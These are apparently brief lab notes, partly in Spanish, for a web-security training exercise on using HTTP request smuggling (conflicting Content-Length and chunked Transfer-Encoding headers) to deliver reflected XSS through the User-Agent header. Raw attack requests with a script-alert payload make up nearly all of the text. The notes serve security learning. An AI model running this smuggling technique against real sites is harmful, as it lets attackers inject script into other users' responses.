10 - Exploiting HTTP request smuggling to deliver reflected XSS

The application is also vulnerable to reflected XSS via the User-Agent header.

GET /post?postId=2 HTTP/2
Host: 0a19001b047e04e7802003d600970016.web-security-academy.net
Cookie: session=OV5Z0JyTiElQ1oyMeFOqY6o1zuR08KSd
User-Agent: "><script>alert()</script>

Lo hacemos así :

POST / HTTP/1.1
Host: 0a19001b047e04e7802003d600970016.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 151
Transfer-Encoding: chunked

0

GET /post?postId=2 HTTP/1.1
Host: 0a19001b047e04e7802003d600970016.web-security-academy.net
User-Agent: "><script>alert(1)</script>
X-Ignore: X